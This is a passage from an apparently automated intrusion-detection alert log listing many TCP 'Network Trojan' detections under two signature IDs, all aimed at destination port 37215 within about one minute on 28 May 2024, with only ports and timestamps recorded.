          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080686
          SID:2835222
          Source Port:41706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.815237
          SID:2829579
          Source Port:44600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190368
          SID:2829579
          Source Port:51632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530134
          SID:2835222
          Source Port:42330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806864
          SID:2835222
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336672
          SID:2835222
          Source Port:59282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115584
          SID:2829579
          Source Port:49622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549414
          SID:2835222
          Source Port:51468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846877
          SID:2835222
          Source Port:53640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975872
          SID:2835222
          Source Port:55900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299647
          SID:2829579
          Source Port:57792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039106
          SID:2829579
          Source Port:45876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402888
          SID:2835222
          Source Port:52928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177494
          SID:2829579
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764085
          SID:2829579
          Source Port:41568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.702609
          SID:2835222
          Source Port:36402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743420
          SID:2835222
          Source Port:44956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626412
          SID:2829579
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222505
          SID:2829579
          Source Port:55736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426463
          SID:2835222
          Source Port:35646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482362
          SID:2835222
          Source Port:35928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156819
          SID:2835222
          Source Port:37268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182241
          SID:2835222
          Source Port:53788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249967
          SID:2829579
          Source Port:33976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893461
          SID:2829579
          Source Port:58590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890063
          SID:2835222
          Source Port:42484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341817
          SID:2829579
          Source Port:59562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245708
          SID:2829579
          Source Port:42620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212736
          SID:2835222
          Source Port:37778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211823
          SID:2835222
          Source Port:57210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890948
          SID:2829579
          Source Port:53352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846392
          SID:2829579
          Source Port:59718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.746024
          SID:2829579
          Source Port:43214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090713
          SID:2835222
          Source Port:42092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891924
          SID:2829579
          Source Port:50120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927814
          SID:2835222
          Source Port:34726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336667
          SID:2835222
          Source Port:56648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.060173
          SID:2829579
          Source Port:49368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033426
          SID:2835222
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770579
          SID:2829579
          Source Port:47784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178016
          SID:2829579
          Source Port:60390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066525
          SID:2835222
          Source Port:50642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322118
          SID:2835222
          Source Port:59334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156227
          SID:2835222
          Source Port:56388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810497
          SID:2829579
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816711
          SID:2829579
          Source Port:60130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530064
          SID:2829579
          Source Port:45892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187161
          SID:2835222
          Source Port:52010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235979
          SID:2835222
          Source Port:47462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652908
          SID:2835222
          Source Port:36284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142036
          SID:2835222
          Source Port:48070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131746
          SID:2829579
          Source Port:40220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111276
          SID:2835222
          Source Port:40598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655525
          SID:2829579
          Source Port:39170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484382
          SID:2829579
          Source Port:40712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853740
          SID:2835222
          Source Port:34300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717997
          SID:2835222
          Source Port:53366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768689
          SID:2835222
          Source Port:39050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147524
          SID:2829579
          Source Port:58214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168428
          SID:2829579
          Source Port:43720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145511
          SID:2835222
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.982912
          SID:2835222
          Source Port:36704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235812
          SID:2829579
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066549
          SID:2829579
          Source Port:42886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156856
          SID:2835222
          Source Port:60708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102792
          SID:2835222
          Source Port:39566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555104
          SID:2835222
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153518
          SID:2835222
          Source Port:52176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325334
          SID:2829579
          Source Port:53148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336971
          SID:2829579
          Source Port:41636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590870
          SID:2829579
          Source Port:46344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064648
          SID:2829579
          Source Port:36512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924006
          SID:2835222
          Source Port:42872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328672
          SID:2835222
          Source Port:49968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273214
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439298
          SID:2829579
          Source Port:41270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326656
          SID:2835222
          Source Port:55528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959049
          SID:2835222
          Source Port:56492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729607
          SID:2835222
          Source Port:45326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.322994
          SID:2835222
          Source Port:32956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045965
          SID:2835222
          Source Port:57388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.073955
          SID:2835222
          Source Port:59782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188080
          SID:2829579
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813024
          SID:2829579
          Source Port:34194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842459
          SID:2829579
          Source Port:46710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208275
          SID:2829579
          Source Port:39774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560994
          SID:2835222
          Source Port:39968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993090
          SID:2829579
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.127421
          SID:2829579
          Source Port:46340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228289
          SID:2835222
          Source Port:35778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.067732
          SID:2829579
          Source Port:53064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156322
          SID:2835222
          Source Port:42022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025903
          SID:2829579
          Source Port:49596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665380
          SID:2835222
          Source Port:35812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778957
          SID:2835222
          Source Port:43226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095551
          SID:2835222
          Source Port:38908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690145
          SID:2835222
          Source Port:36400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889774
          SID:2835222
          Source Port:40766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142046
          SID:2835222
          Source Port:52592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272276
          SID:2835222
          Source Port:59524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669308
          SID:2835222
          Source Port:42466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.070380
          SID:2835222
          Source Port:41514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543370
          SID:2835222
          Source Port:47764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741772
          SID:2835222
          Source Port:42968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.888354
          SID:2835222
          Source Port:56976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.797097
          SID:2829579
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681127
          SID:2829579
          Source Port:35290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.284878
          SID:2829579
          Source Port:34216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066519
          SID:2835222
          Source Port:54922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764652
          SID:2829579
          Source Port:46478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887430
          SID:2835222
          Source Port:43312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298163
          SID:2829579
          Source Port:51980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816153
          SID:2829579
          Source Port:41476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214816
          SID:2829579
          Source Port:42448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594429
          SID:2829579
          Source Port:53858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302889
          SID:2835222
          Source Port:39926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543459
          SID:2835222
          Source Port:54694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372139
          SID:2835222
          Source Port:42796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089730
          SID:2835222
          Source Port:42386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733179
          SID:2829579
          Source Port:55744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817689
          SID:2835222
          Source Port:37270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156800
          SID:2829579
          Source Port:42882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297686
          SID:2835222
          Source Port:48160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248893
          SID:2835222
          Source Port:50214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704070
          SID:2829579
          Source Port:34692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841328
          SID:2835222
          Source Port:49266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742419
          SID:2835222
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195721
          SID:2835222
          Source Port:44936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930918
          SID:2829579
          Source Port:46292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142554
          SID:2835222
          Source Port:42922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211461
          SID:2835222
          Source Port:39722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.564063
          SID:2835222
          Source Port:59722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743366
          SID:2835222
          Source Port:57408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781050
          SID:2835222
          Source Port:44890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268843
          SID:2835222
          Source Port:58756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530047
          SID:2829579
          Source Port:42796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.903471
          SID:2829579
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182203
          SID:2835222
          Source Port:40038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484966
          SID:2829579
          Source Port:56332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325350
          SID:2829579
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962688
          SID:2829579
          Source Port:38954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.534292
          SID:2835222
          Source Port:40672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979049
          SID:2835222
          Source Port:59860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205403
          SID:2835222
          Source Port:42800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770250
          SID:2829579
          Source Port:43894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840058
          SID:2829579
          Source Port:47858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613944
          SID:2829579
          Source Port:57890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529110
          SID:2835222
          Source Port:52708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358083
          SID:2829579
          Source Port:35704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238457
          SID:2835222
          Source Port:48178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.777140
          SID:2829579
          Source Port:51634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.092739
          SID:2835222
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273253
          SID:2835222
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482589
          SID:2829579
          Source Port:36894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756352
          SID:2829579
          Source Port:33874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.814292
          SID:2829579
          Source Port:50660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892650
          SID:2835222
          Source Port:55826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734366
          SID:2829579
          Source Port:42708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045833
          SID:2829579
          Source Port:53430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051177
          SID:2829579
          Source Port:55540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267099
          SID:2829579
          Source Port:47220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207024
          SID:2835222
          Source Port:50810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548588
          SID:2835222
          Source Port:46942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273432
          SID:2829579
          Source Port:45784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858805
          SID:2835222
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141748
          SID:2835222
          Source Port:58028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796208
          SID:2829579
          Source Port:52158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922880
          SID:2829579
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283362
          SID:2835222
          Source Port:56450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285854
          SID:2829579
          Source Port:51924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652391
          SID:2829579
          Source Port:36406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858433
          SID:2835222
          Source Port:59240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341014
          SID:2829579
          Source Port:54794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195387
          SID:2835222
          Source Port:58290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.856712
          SID:2835222
          Source Port:58698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774236
          SID:2835222
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301269
          SID:2835222
          Source Port:41314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185889
          SID:2835222
          Source Port:41914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480350
          SID:2835222
          Source Port:57742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272666
          SID:2835222
          Source Port:53472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338708
          SID:2835222
          Source Port:38314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330050
          SID:2829579
          Source Port:42728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267373
          SID:2835222
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463432
          SID:2829579
          Source Port:38664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064047
          SID:2835222
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350097
          SID:2829579
          Source Port:38546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530306
          SID:2829579
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350480
          SID:2829579
          Source Port:51870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.701222
          SID:2829579
          Source Port:60916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116872
          SID:2835222
          Source Port:35570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399513
          SID:2829579
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437848
          SID:2835222
          Source Port:38570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152852
          SID:2829579
          Source Port:34768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594174
          SID:2829579
          Source Port:42558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.792512
          SID:2829579
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223177
          SID:2835222
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941266
          SID:2829579
          Source Port:34652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
